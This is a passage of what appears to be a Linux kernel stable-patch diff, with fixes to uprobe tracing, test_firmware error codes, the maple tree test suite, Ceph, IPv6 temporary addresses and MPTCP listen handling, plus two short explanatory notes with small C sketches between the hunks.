++++ b/kernel/trace/trace_uprobe.c
+@@ -170,7 +170,8 @@ fetch_store_string(unsigned long addr, void *dest, void *base)
+ 			 */
+ 			ret++;
+ 		*(u32 *)dest = make_data_loc(ret, (void *)dst - base);
+-	}
++	} else
++		*(u32 *)dest = make_data_loc(0, (void *)dst - base);
+ 
+ 	return ret;
+ }
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index 13d3fa6aa972c..490a4179879a8 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -214,7 +214,7 @@ static int __kstrncpy(char **dst, const char *name, size_t count, gfp_t gfp)
+ {
+ 	*dst = kstrndup(name, count, gfp);
+ 	if (!*dst)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 	return count;
+ }
+ 
+@@ -671,7 +671,7 @@ static ssize_t trigger_request_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("loading '%s'\n", name);
+ 
+@@ -719,7 +719,7 @@ static ssize_t trigger_request_platform_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("inserting test platform fw '%s'\n", name);
+ 	efi_embedded_fw.name = name;
+@@ -772,7 +772,7 @@ static ssize_t trigger_async_request_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("loading '%s'\n", name);
+ 
+@@ -817,7 +817,7 @@ static ssize_t trigger_custom_fallback_store(struct device *dev,
+ 
+ 	name = kstrndup(buf, count, GFP_KERNEL);
+ 	if (!name)
+-		return -ENOSPC;
++		return -ENOMEM;
+ 
+ 	pr_info("loading '%s' using custom fallback mechanism\n", name);
+ 
+@@ -868,7 +868,7 @@ static int test_fw_run_batch_request(void *data)
+ 
+ 		test_buf = kzalloc(TEST_FIRMWARE_BUF_SIZE, GFP_KERNEL);
+ 		if (!test_buf)
+-			return -ENOSPC;
++			return -ENOMEM;
+ 
+ 		if (test_fw_config->partial)
+ 			req->rc = request_partial_firmware_into_buf
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index f7364b9fee939..fad668042f3e7 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -30,54 +30,54 @@
+ #else
+ #define cond_resched()			do {} while (0)
+ #endif
+-static
+-int mtree_insert_index(struct maple_tree *mt, unsigned long index, gfp_t gfp)
++static int __init mtree_insert_index(struct maple_tree *mt,
++				     unsigned long index, gfp_t gfp)
+ {
+ 	return mtree_insert(mt, index, xa_mk_value(index & LONG_MAX), gfp);
+ }
+ 
+-static void mtree_erase_index(struct maple_tree *mt, unsigned long index)
++static void __init mtree_erase_index(struct maple_tree *mt, unsigned long index)
+ {
+ 	MT_BUG_ON(mt, mtree_erase(mt, index) != xa_mk_value(index & LONG_MAX));
+ 	MT_BUG_ON(mt, mtree_load(mt, index) != NULL);
+ }
+ 
+-static int mtree_test_insert(struct maple_tree *mt, unsigned long index,
++static int __init mtree_test_insert(struct maple_tree *mt, unsigned long index,
+ 				void *ptr)
+ {
+ 	return mtree_insert(mt, index, ptr, GFP_KERNEL);
+ }
+ 
+-static int mtree_test_store_range(struct maple_tree *mt, unsigned long start,
+-				unsigned long end, void *ptr)
++static int __init mtree_test_store_range(struct maple_tree *mt,
++			unsigned long start, unsigned long end, void *ptr)
+ {
+ 	return mtree_store_range(mt, start, end, ptr, GFP_KERNEL);
+ }
+ 
+-static int mtree_test_store(struct maple_tree *mt, unsigned long start,
++static int __init mtree_test_store(struct maple_tree *mt, unsigned long start,
+ 				void *ptr)
+ {
+ 	return mtree_test_store_range(mt, start, start, ptr);
+ }
+ 
+-static int mtree_test_insert_range(struct maple_tree *mt, unsigned long start,
+-				unsigned long end, void *ptr)
++static int __init mtree_test_insert_range(struct maple_tree *mt,
++			unsigned long start, unsigned long end, void *ptr)
+ {
+ 	return mtree_insert_range(mt, start, end, ptr, GFP_KERNEL);
+ }
+ 
+-static void *mtree_test_load(struct maple_tree *mt, unsigned long index)
++static void __init *mtree_test_load(struct maple_tree *mt, unsigned long index)
+ {
+ 	return mtree_load(mt, index);
+ }
+ 
+-static void *mtree_test_erase(struct maple_tree *mt, unsigned long index)
++static void __init *mtree_test_erase(struct maple_tree *mt, unsigned long index)
+ {
+ 	return mtree_erase(mt, index);
+ }
+ 
+ #if defined(CONFIG_64BIT)
+-static noinline void check_mtree_alloc_range(struct maple_tree *mt,
++static noinline void __init check_mtree_alloc_range(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, unsigned long size,
+ 		unsigned long expected, int eret, void *ptr)
+ {
+@@ -94,7 +94,7 @@ static noinline void check_mtree_alloc_range(struct maple_tree *mt,
+ 	MT_BUG_ON(mt, result != expected);
+ }
+ 
+-static noinline void check_mtree_alloc_rrange(struct maple_tree *mt,
++static noinline void __init check_mtree_alloc_rrange(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, unsigned long size,
+ 		unsigned long expected, int eret, void *ptr)
+ {
+@@ -112,8 +112,8 @@ static noinline void check_mtree_alloc_rrange(struct maple_tree *mt,
+ }
+ #endif
+ 
+-static noinline void check_load(struct maple_tree *mt, unsigned long index,
+-				void *ptr)
++static noinline void __init check_load(struct maple_tree *mt,
++				       unsigned long index, void *ptr)
+ {
+ 	void *ret = mtree_test_load(mt, index);
+ 
+@@ -122,7 +122,7 @@ static noinline void check_load(struct maple_tree *mt, unsigned long index,
+ 	MT_BUG_ON(mt, ret != ptr);
+ }
+ 
+-static noinline void check_store_range(struct maple_tree *mt,
++static noinline void __init check_store_range(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, void *ptr, int expected)
+ {
+ 	int ret = -EINVAL;
+@@ -138,7 +138,7 @@ static noinline void check_store_range(struct maple_tree *mt,
+ 		check_load(mt, i, ptr);
+ }
+ 
+-static noinline void check_insert_range(struct maple_tree *mt,
++static noinline void __init check_insert_range(struct maple_tree *mt,
+ 		unsigned long start, unsigned long end, void *ptr, int expected)
+ {
+ 	int ret = -EINVAL;
+@@ -154,8 +154,8 @@ static noinline void check_insert_range(struct maple_tree *mt,
+ 		check_load(mt, i, ptr);
+ }
+ 
+-static noinline void check_insert(struct maple_tree *mt, unsigned long index,
+-		void *ptr)
++static noinline void __init check_insert(struct maple_tree *mt,
++					 unsigned long index, void *ptr)
+ {
+ 	int ret = -EINVAL;
+ 
+@@ -163,7 +163,7 @@ static noinline void check_insert(struct maple_tree *mt, unsigned long index,
+ 	MT_BUG_ON(mt, ret != 0);
+ }
+ 
+-static noinline void check_dup_insert(struct maple_tree *mt,
++static noinline void __init check_dup_insert(struct maple_tree *mt,
+ 				      unsigned long index, void *ptr)
+ {
+ 	int ret = -EINVAL;
+@@ -173,13 +173,13 @@ static noinline void check_dup_insert(struct maple_tree *mt,
+ }
+ 
+ 
+-static noinline
+-void check_index_load(struct maple_tree *mt, unsigned long index)
++static noinline void __init check_index_load(struct maple_tree *mt,
++					     unsigned long index)
+ {
+ 	return check_load(mt, index, xa_mk_value(index & LONG_MAX));
+ }
+ 
+-static inline int not_empty(struct maple_node *node)
++static inline __init int not_empty(struct maple_node *node)
+ {
+ 	int i;
+ 
+@@ -194,8 +194,8 @@ static inline int not_empty(struct maple_node *node)
+ }
+ 
+ 
+-static noinline void check_rev_seq(struct maple_tree *mt, unsigned long max,
+-		bool verbose)
++static noinline void __init check_rev_seq(struct maple_tree *mt,
++					  unsigned long max, bool verbose)
+ {
+ 	unsigned long i = max, j;
+ 
+@@ -227,7 +227,7 @@ static noinline void check_rev_seq(struct maple_tree *mt, unsigned long max,
+ #endif
+ }
+ 
+-static noinline void check_seq(struct maple_tree *mt, unsigned long max,
++static noinline void __init check_seq(struct maple_tree *mt, unsigned long max,
+ 		bool verbose)
+ {
+ 	unsigned long i, j;
+@@ -256,7 +256,7 @@ static noinline void check_seq(struct maple_tree *mt, unsigned long max,
+ #endif
+ }
+ 
+-static noinline void check_lb_not_empty(struct maple_tree *mt)
++static noinline void __init check_lb_not_empty(struct maple_tree *mt)
+ {
+ 	unsigned long i, j;
+ 	unsigned long huge = 4000UL * 1000 * 1000;
+@@ -275,13 +275,13 @@ static noinline void check_lb_not_empty(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_lower_bound_split(struct maple_tree *mt)
++static noinline void __init check_lower_bound_split(struct maple_tree *mt)
+ {
+ 	MT_BUG_ON(mt, !mtree_empty(mt));
+ 	check_lb_not_empty(mt);
+ }
+ 
+-static noinline void check_upper_bound_split(struct maple_tree *mt)
++static noinline void __init check_upper_bound_split(struct maple_tree *mt)
+ {
+ 	unsigned long i, j;
+ 	unsigned long huge;
+@@ -306,7 +306,7 @@ static noinline void check_upper_bound_split(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_mid_split(struct maple_tree *mt)
++static noinline void __init check_mid_split(struct maple_tree *mt)
+ {
+ 	unsigned long huge = 8000UL * 1000 * 1000;
+ 
+@@ -315,7 +315,7 @@ static noinline void check_mid_split(struct maple_tree *mt)
+ 	check_lb_not_empty(mt);
+ }
+ 
+-static noinline void check_rev_find(struct maple_tree *mt)
++static noinline void __init check_rev_find(struct maple_tree *mt)
+ {
+ 	int i, nr_entries = 200;
+ 	void *val;
+@@ -354,7 +354,7 @@ static noinline void check_rev_find(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
+-static noinline void check_find(struct maple_tree *mt)
++static noinline void __init check_find(struct maple_tree *mt)
+ {
+ 	unsigned long val = 0;
+ 	unsigned long count;
+@@ -571,7 +571,7 @@ static noinline void check_find(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_find_2(struct maple_tree *mt)
++static noinline void __init check_find_2(struct maple_tree *mt)
+ {
+ 	unsigned long i, j;
+ 	void *entry;
+@@ -616,7 +616,7 @@ static noinline void check_find_2(struct maple_tree *mt)
+ 
+ 
+ #if defined(CONFIG_64BIT)
+-static noinline void check_alloc_rev_range(struct maple_tree *mt)
++static noinline void __init check_alloc_rev_range(struct maple_tree *mt)
+ {
+ 	/*
+ 	 * Generated by:
+@@ -624,7 +624,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 	 * awk -F "-" '{printf "0x%s, 0x%s, ", $1, $2}'
+ 	 */
+ 
+-	unsigned long range[] = {
++	static const unsigned long range[] = {
+ 	/*      Inclusive     , Exclusive. */
+ 		0x565234af2000, 0x565234af4000,
+ 		0x565234af4000, 0x565234af9000,
+@@ -652,7 +652,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 		0x7fff58791000, 0x7fff58793000,
+ 	};
+ 
+-	unsigned long holes[] = {
++	static const unsigned long holes[] = {
+ 		/*
+ 		 * Note: start of hole is INCLUSIVE
+ 		 *        end of hole is EXCLUSIVE
+@@ -672,7 +672,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 	 * 4. number that should be returned.
+ 	 * 5. return value
+ 	 */
+-	unsigned long req_range[] = {
++	static const unsigned long req_range[] = {
+ 		0x565234af9000, /* Min */
+ 		0x7fff58791000, /* Max */
+ 		0x1000,         /* Size */
+@@ -783,7 +783,7 @@ static noinline void check_alloc_rev_range(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_alloc_range(struct maple_tree *mt)
++static noinline void __init check_alloc_range(struct maple_tree *mt)
+ {
+ 	/*
+ 	 * Generated by:
+@@ -791,7 +791,7 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ 	 * awk -F "-" '{printf "0x%s, 0x%s, ", $1, $2}'
+ 	 */
+ 
+-	unsigned long range[] = {
++	static const unsigned long range[] = {
+ 	/*      Inclusive     , Exclusive. */
+ 		0x565234af2000, 0x565234af4000,
+ 		0x565234af4000, 0x565234af9000,
+@@ -818,7 +818,7 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ 		0x7fff5878e000, 0x7fff58791000,
+ 		0x7fff58791000, 0x7fff58793000,
+ 	};
+-	unsigned long holes[] = {
++	static const unsigned long holes[] = {
+ 		/* Start of hole, end of hole,  size of hole (+1) */
+ 		0x565234afb000, 0x565234afc000, 0x1000,
+ 		0x565234afe000, 0x565235def000, 0x12F1000,
+@@ -833,7 +833,7 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ 	 * 4. number that should be returned.
+ 	 * 5. return value
+ 	 */
+-	unsigned long req_range[] = {
++	static const unsigned long req_range[] = {
+ 		0x565234af9000, /* Min */
+ 		0x7fff58791000, /* Max */
+ 		0x1000,         /* Size */
+@@ -942,10 +942,10 @@ static noinline void check_alloc_range(struct maple_tree *mt)
+ }
+ #endif
+ 
+-static noinline void check_ranges(struct maple_tree *mt)
++static noinline void __init check_ranges(struct maple_tree *mt)
+ {
+ 	int i, val, val2;
+-	unsigned long r[] = {
++	static const unsigned long r[] = {
+ 		10, 15,
+ 		20, 25,
+ 		17, 22, /* Overlaps previous range. */
+@@ -1210,7 +1210,7 @@ static noinline void check_ranges(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, mt_height(mt) != 4);
+ }
+ 
+-static noinline void check_next_entry(struct maple_tree *mt)
++static noinline void __init check_next_entry(struct maple_tree *mt)
+ {
+ 	void *entry = NULL;
+ 	unsigned long limit = 30, i = 0;
+@@ -1234,7 +1234,7 @@ static noinline void check_next_entry(struct maple_tree *mt)
+ 	mtree_destroy(mt);
+ }
+ 
+-static noinline void check_prev_entry(struct maple_tree *mt)
++static noinline void __init check_prev_entry(struct maple_tree *mt)
+ {
+ 	unsigned long index = 16;
+ 	void *value;
+@@ -1278,7 +1278,7 @@ static noinline void check_prev_entry(struct maple_tree *mt)
+ 	mas_unlock(&mas);
+ }
+ 
+-static noinline void check_root_expand(struct maple_tree *mt)
++static noinline void __init check_root_expand(struct maple_tree *mt)
+ {
+ 	MA_STATE(mas, mt, 0, 0);
+ 	void *ptr;
+@@ -1367,13 +1367,13 @@ static noinline void check_root_expand(struct maple_tree *mt)
+ 	mas_unlock(&mas);
+ }
+ 
+-static noinline void check_gap_combining(struct maple_tree *mt)
++static noinline void __init check_gap_combining(struct maple_tree *mt)
+ {
+ 	struct maple_enode *mn1, *mn2;
+ 	void *entry;
+ 	unsigned long singletons = 100;
+-	unsigned long *seq100;
+-	unsigned long seq100_64[] = {
++	static const unsigned long *seq100;
++	static const unsigned long seq100_64[] = {
+ 		/* 0-5 */
+ 		74, 75, 76,
+ 		50, 100, 2,
+@@ -1387,7 +1387,7 @@ static noinline void check_gap_combining(struct maple_tree *mt)
+ 		76, 2, 79, 85, 4,
+ 	};
+ 
+-	unsigned long seq100_32[] = {
++	static const unsigned long seq100_32[] = {
+ 		/* 0-5 */
+ 		61, 62, 63,
+ 		50, 100, 2,
+@@ -1401,11 +1401,11 @@ static noinline void check_gap_combining(struct maple_tree *mt)
+ 		76, 2, 79, 85, 4,
+ 	};
+ 
+-	unsigned long seq2000[] = {
++	static const unsigned long seq2000[] = {
+ 		1152, 1151,
+ 		1100, 1200, 2,
+ 	};
+-	unsigned long seq400[] = {
++	static const unsigned long seq400[] = {
+ 		286, 318,
+ 		256, 260, 266, 270, 275, 280, 290, 398,
+ 		286, 310,
+@@ -1564,7 +1564,7 @@ static noinline void check_gap_combining(struct maple_tree *mt)
+ 	mt_set_non_kernel(0);
+ 	mtree_destroy(mt);
+ }
+-static noinline void check_node_overwrite(struct maple_tree *mt)
++static noinline void __init check_node_overwrite(struct maple_tree *mt)
+ {
+ 	int i, max = 4000;
+ 
+@@ -1577,7 +1577,7 @@ static noinline void check_node_overwrite(struct maple_tree *mt)
+ }
+ 
+ #if defined(BENCH_SLOT_STORE)
+-static noinline void bench_slot_store(struct maple_tree *mt)
++static noinline void __init bench_slot_store(struct maple_tree *mt)
+ {
+ 	int i, brk = 105, max = 1040, brk_start = 100, count = 20000000;
+ 
+@@ -1593,7 +1593,7 @@ static noinline void bench_slot_store(struct maple_tree *mt)
+ #endif
+ 
+ #if defined(BENCH_NODE_STORE)
+-static noinline void bench_node_store(struct maple_tree *mt)
++static noinline void __init bench_node_store(struct maple_tree *mt)
+ {
+ 	int i, overwrite = 76, max = 240, count = 20000000;
+ 
+@@ -1612,7 +1612,7 @@ static noinline void bench_node_store(struct maple_tree *mt)
+ #endif
+ 
+ #if defined(BENCH_AWALK)
+-static noinline void bench_awalk(struct maple_tree *mt)
++static noinline void __init bench_awalk(struct maple_tree *mt)
+ {
+ 	int i, max = 2500, count = 50000000;
+ 	MA_STATE(mas, mt, 1470, 1470);
+@@ -1629,7 +1629,7 @@ static noinline void bench_awalk(struct maple_tree *mt)
+ }
+ #endif
+ #if defined(BENCH_WALK)
+-static noinline void bench_walk(struct maple_tree *mt)
++static noinline void __init bench_walk(struct maple_tree *mt)
+ {
+ 	int i, max = 2500, count = 550000000;
+ 	MA_STATE(mas, mt, 1470, 1470);
+@@ -1646,7 +1646,7 @@ static noinline void bench_walk(struct maple_tree *mt)
+ #endif
+ 
+ #if defined(BENCH_MT_FOR_EACH)
+-static noinline void bench_mt_for_each(struct maple_tree *mt)
++static noinline void __init bench_mt_for_each(struct maple_tree *mt)
+ {
+ 	int i, count = 1000000;
+ 	unsigned long max = 2500, index = 0;
+@@ -1670,7 +1670,7 @@ static noinline void bench_mt_for_each(struct maple_tree *mt)
+ #endif
+ 
+ /* check_forking - simulate the kernel forking sequence with the tree. */
+-static noinline void check_forking(struct maple_tree *mt)
++static noinline void __init check_forking(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_tree newmt;
+@@ -1709,7 +1709,75 @@ static noinline void check_forking(struct maple_tree *mt)
+ 	mtree_destroy(&newmt);
+ }
+ 
+-static noinline void check_mas_store_gfp(struct maple_tree *mt)
++static noinline void __init check_iteration(struct maple_tree *mt)
++{
++	int i, nr_entries = 125;
++	void *val;
++	MA_STATE(mas, mt, 0, 0);
++
++	for (i = 0; i <= nr_entries; i++)
++		mtree_store_range(mt, i * 10, i * 10 + 9,
++				  xa_mk_value(i), GFP_KERNEL);
++
++	mt_set_non_kernel(99999);
++
++	i = 0;
++	mas_lock(&mas);
++	mas_for_each(&mas, val, 925) {
++		MT_BUG_ON(mt, mas.index != i * 10);
++		MT_BUG_ON(mt, mas.last != i * 10 + 9);
++		/* Overwrite end of entry 92 */
++		if (i == 92) {
++			mas.index = 925;
++			mas.last = 929;
++			mas_store(&mas, val);
++		}
++		i++;
++	}
++	/* Ensure mas_find() gets the next value */
++	val = mas_find(&mas, ULONG_MAX);
++	MT_BUG_ON(mt, val != xa_mk_value(i));
++
++	mas_set(&mas, 0);
++	i = 0;
++	mas_for_each(&mas, val, 785) {
++		MT_BUG_ON(mt, mas.index != i * 10);
++		MT_BUG_ON(mt, mas.last != i * 10 + 9);
++		/* Overwrite start of entry 78 */
++		if (i == 78) {
++			mas.index = 780;
++			mas.last = 785;
++			mas_store(&mas, val);
++		} else {
++			i++;
++		}
++	}
++	val = mas_find(&mas, ULONG_MAX);
++	MT_BUG_ON(mt, val != xa_mk_value(i));
++
++	mas_set(&mas, 0);
++	i = 0;
++	mas_for_each(&mas, val, 765) {
++		MT_BUG_ON(mt, mas.index != i * 10);
++		MT_BUG_ON(mt, mas.last != i * 10 + 9);
++		/* Overwrite end of entry 76 and advance to the end */
++		if (i == 76) {
++			mas.index = 760;
++			mas.last = 765;
++			mas_store(&mas, val);
++			mas_next(&mas, ULONG_MAX);
++		}
++		i++;
++	}
++	/* Make sure the next find returns the one after 765, 766-769 */
++	val = mas_find(&mas, ULONG_MAX);
++	MT_BUG_ON(mt, val != xa_mk_value(76));
++	mas_unlock(&mas);
++	mas_destroy(&mas);
++	mt_set_non_kernel(0);
++}
++
++static noinline void __init check_mas_store_gfp(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_tree newmt;
+@@ -1742,7 +1810,7 @@ static noinline void check_mas_store_gfp(struct maple_tree *mt)
+ }
+ 
+ #if defined(BENCH_FORK)
+-static noinline void bench_forking(struct maple_tree *mt)
++static noinline void __init bench_forking(struct maple_tree *mt)
+ {
+ 
+ 	struct maple_tree newmt;
+@@ -1784,22 +1852,27 @@ static noinline void bench_forking(struct maple_tree *mt)
+ }
+ #endif
+ 
+-static noinline void next_prev_test(struct maple_tree *mt)
++static noinline void __init next_prev_test(struct maple_tree *mt)
+ {
+ 	int i, nr_entries;
+ 	void *val;
+ 	MA_STATE(mas, mt, 0, 0);
+ 	struct maple_enode *mn;
+-	unsigned long *level2;
+-	unsigned long level2_64[] = {707, 1000, 710, 715, 720, 725};
+-	unsigned long level2_32[] = {1747, 2000, 1750, 1755, 1760, 1765};
++	static const unsigned long *level2;
++	static const unsigned long level2_64[] = { 707, 1000, 710, 715, 720,
++						   725};
++	static const unsigned long level2_32[] = { 1747, 2000, 1750, 1755,
++						   1760, 1765};
++	unsigned long last_index;
+ 
+ 	if (MAPLE_32BIT) {
+ 		nr_entries = 500;
+ 		level2 = level2_32;
++		last_index = 0x138e;
+ 	} else {
+ 		nr_entries = 200;
+ 		level2 = level2_64;
++		last_index = 0x7d6;
+ 	}
+ 
+ 	for (i = 0; i <= nr_entries; i++)
+@@ -1906,7 +1979,7 @@ static noinline void next_prev_test(struct maple_tree *mt)
+ 
+ 	val = mas_next(&mas, ULONG_MAX);
+ 	MT_BUG_ON(mt, val != NULL);
+-	MT_BUG_ON(mt, mas.index != ULONG_MAX);
++	MT_BUG_ON(mt, mas.index != last_index);
+ 	MT_BUG_ON(mt, mas.last != ULONG_MAX);
+ 
+ 	val = mas_prev(&mas, 0);
+@@ -1960,7 +2033,7 @@ static noinline void next_prev_test(struct maple_tree *mt)
+ 
+ 
+ /* Test spanning writes that require balancing right sibling or right cousin */
+-static noinline void check_spanning_relatives(struct maple_tree *mt)
++static noinline void __init check_spanning_relatives(struct maple_tree *mt)
+ {
+ 
+ 	unsigned long i, nr_entries = 1000;
+@@ -1973,7 +2046,7 @@ static noinline void check_spanning_relatives(struct maple_tree *mt)
+ 	mtree_store_range(mt, 9365, 9955, NULL, GFP_KERNEL);
+ }
+ 
+-static noinline void check_fuzzer(struct maple_tree *mt)
++static noinline void __init check_fuzzer(struct maple_tree *mt)
+ {
+ 	/*
+ 	 * 1. Causes a spanning rebalance of a single root node.
+@@ -2370,7 +2443,7 @@ static noinline void check_fuzzer(struct maple_tree *mt)
+ }
+ 
+ /* duplicate the tree with a specific gap */
+-static noinline void check_dup_gaps(struct maple_tree *mt,
++static noinline void __init check_dup_gaps(struct maple_tree *mt,
+ 				    unsigned long nr_entries, bool zero_start,
+ 				    unsigned long gap)
+ {
+@@ -2410,7 +2483,7 @@ static noinline void check_dup_gaps(struct maple_tree *mt,
+ }
+ 
+ /* Duplicate many sizes of trees.  Mainly to test expected entry values */
+-static noinline void check_dup(struct maple_tree *mt)
++static noinline void __init check_dup(struct maple_tree *mt)
+ {
+ 	int i;
+ 	int big_start = 100010;
+@@ -2498,7 +2571,7 @@ static noinline void check_dup(struct maple_tree *mt)
+ 	}
+ }
+ 
+-static noinline void check_bnode_min_spanning(struct maple_tree *mt)
++static noinline void __init check_bnode_min_spanning(struct maple_tree *mt)
+ {
+ 	int i = 50;
+ 	MA_STATE(mas, mt, 0, 0);
+@@ -2517,7 +2590,7 @@ static noinline void check_bnode_min_spanning(struct maple_tree *mt)
+ 	mt_set_non_kernel(0);
+ }
+ 
+-static noinline void check_empty_area_window(struct maple_tree *mt)
++static noinline void __init check_empty_area_window(struct maple_tree *mt)
+ {
+ 	unsigned long i, nr_entries = 20;
+ 	MA_STATE(mas, mt, 0, 0);
+@@ -2602,7 +2675,7 @@ static noinline void check_empty_area_window(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
+-static noinline void check_empty_area_fill(struct maple_tree *mt)
++static noinline void __init check_empty_area_fill(struct maple_tree *mt)
+ {
+ 	const unsigned long max = 0x25D78000;
+ 	unsigned long size;
+@@ -2646,11 +2719,11 @@ static noinline void check_empty_area_fill(struct maple_tree *mt)
+ }
+ 
+ static DEFINE_MTREE(tree);
+-static int maple_tree_seed(void)
++static int __init maple_tree_seed(void)
+ {
+-	unsigned long set[] = {5015, 5014, 5017, 25, 1000,
+-			       1001, 1002, 1003, 1005, 0,
+-			       5003, 5002};
++	unsigned long set[] = { 5015, 5014, 5017, 25, 1000,
++				1001, 1002, 1003, 1005, 0,
++				5003, 5002};
+ 	void *ptr = &set;
+ 
+ 	pr_info("\nTEST STARTING\n\n");
+@@ -2702,6 +2775,10 @@ static int maple_tree_seed(void)
+ 	goto skip;
+ #endif
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_iteration(&tree);
++	mtree_destroy(&tree);
++
+ 	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
+ 	check_forking(&tree);
+ 	mtree_destroy(&tree);
+@@ -2916,7 +2993,7 @@ skip:
+ 	return -EINVAL;
+ }
+ 
+-static void maple_tree_harvest(void)
++static void __exit maple_tree_harvest(void)
+ {
+ 
+ }
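
The hunk above applies two mechanical transformations across the maple tree test suite: the test functions gain __init/__exit annotations so their text can be discarded after module init, and the large test vectors move from function-local arrays into static const storage. A minimal userspace sketch of the second point, with made-up values, shows why it matters: a non-static initialized array is rebuilt on the stack at every call, while a static const one lives in read-only data.

	#include <stdio.h>

	/* Illustrative sketch only; values are made up. */
	static void on_stack(void)
	{
		unsigned long set[] = { 5015, 5014, 5017, 25, 1000 };	/* copied onto the stack per call */

		printf("%lu\n", set[0]);
	}

	static void in_rodata(void)
	{
		static const unsigned long set[] = { 5015, 5014, 5017, 25, 1000 };	/* one read-only copy */

		printf("%lu\n", set[0]);
	}

	int main(void)
	{
		on_stack();
		in_rodata();
		return 0;
	}
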
+diff --git a/net/ceph/messenger.c b/net/ceph/messenger.c
+index dfa237fbd5a32..09feb3f1fcaa3 100644
+--- a/net/ceph/messenger.c
++++ b/net/ceph/messenger.c
+@@ -1118,6 +1118,7 @@ bool ceph_addr_is_blank(const struct ceph_entity_addr *addr)
+ 		return true;
+ 	}
+ }
++EXPORT_SYMBOL(ceph_addr_is_blank);
+ 
+ int ceph_addr_port(const struct ceph_entity_addr *addr)
+ {
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 51bfc74805ecf..48a6486951cd6 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -2561,12 +2561,18 @@ static void manage_tempaddrs(struct inet6_dev *idev,
+ 			ipv6_ifa_notify(0, ift);
+ 	}
+ 
+-	if ((create || list_empty(&idev->tempaddr_list)) &&
+-	    idev->cnf.use_tempaddr > 0) {
++	/* Also create a temporary address if it's enabled but no temporary
++	 * address currently exists.
++	 * However, we get called with valid_lft == 0, prefered_lft == 0, create == false
++	 * as part of cleanup (ie. deleting the mngtmpaddr).
++	 * We don't want that to result in creating a new temporary ip address.
++	 */
++	if (list_empty(&idev->tempaddr_list) && (valid_lft || prefered_lft))
++		create = true;
++
++	if (create && idev->cnf.use_tempaddr > 0) {
+ 		/* When a new public address is created as described
+ 		 * in [ADDRCONF], also create a new temporary address.
+-		 * Also create a temporary address if it's enabled but
+-		 * no temporary address currently exists.
+ 		 */
+ 		read_unlock_bh(&idev->lock);
+ 		ipv6_create_tempaddr(ifp, false);
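
The reworked condition above ensures the cleanup path (valid_lft == 0, prefered_lft == 0, create == false) no longer spawns a fresh temporary address. A standalone sketch of just that predicate, with the idev state reduced to booleans and the use_tempaddr sysctl check omitted for brevity:

	#include <stdbool.h>
	#include <stdio.h>

	/* Sketch of the new manage_tempaddrs() decision: only auto-create
	 * a temporary address when none exists AND the caller passed
	 * non-zero lifetimes. */
	static bool should_create(bool create, bool list_empty,
				  unsigned long valid_lft, unsigned long prefered_lft)
	{
		if (list_empty && (valid_lft || prefered_lft))
			create = true;
		return create;
	}

	int main(void)
	{
		/* cleanup call: empty list but zero lifetimes -> no new address */
		printf("%d\n", should_create(false, true, 0, 0));	/* 0 */
		/* normal call: empty list, live prefix -> create one */
		printf("%d\n", should_create(false, true, 3600, 1800));	/* 1 */
		return 0;
	}
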
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 4ca61e80f4bb2..f6f2e6417dcbe 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2945,9 +2945,9 @@ static void mptcp_check_listen_stop(struct sock *sk)
+ 		return;
+ 
+ 	lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++	tcp_set_state(ssk, TCP_CLOSE);
+ 	mptcp_subflow_queue_clean(sk, ssk);
+ 	inet_csk_listen_stop(ssk);
+-	tcp_set_state(ssk, TCP_CLOSE);
+ 	release_sock(ssk);
+ }
+ 
+@@ -3746,12 +3746,18 @@ unlock:
+ static int mptcp_listen(struct socket *sock, int backlog)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sock->sk);
++	struct sock *sk = sock->sk;
+ 	struct socket *ssock;
+ 	int err;
+ 
+ 	pr_debug("msk=%p", msk);
+ 
+-	lock_sock(sock->sk);
++	lock_sock(sk);
++
++	err = -EINVAL;
++	if (sock->state != SS_UNCONNECTED || sock->type != SOCK_STREAM)
++		goto unlock;
++
+ 	ssock = __mptcp_nmpc_socket(msk);
+ 	if (!ssock) {
+ 		err = -EINVAL;
+@@ -3759,16 +3765,16 @@ static int mptcp_listen(struct socket *sock, int backlog)
+ 	}
+ 
+ 	mptcp_token_destroy(msk);
+-	inet_sk_state_store(sock->sk, TCP_LISTEN);
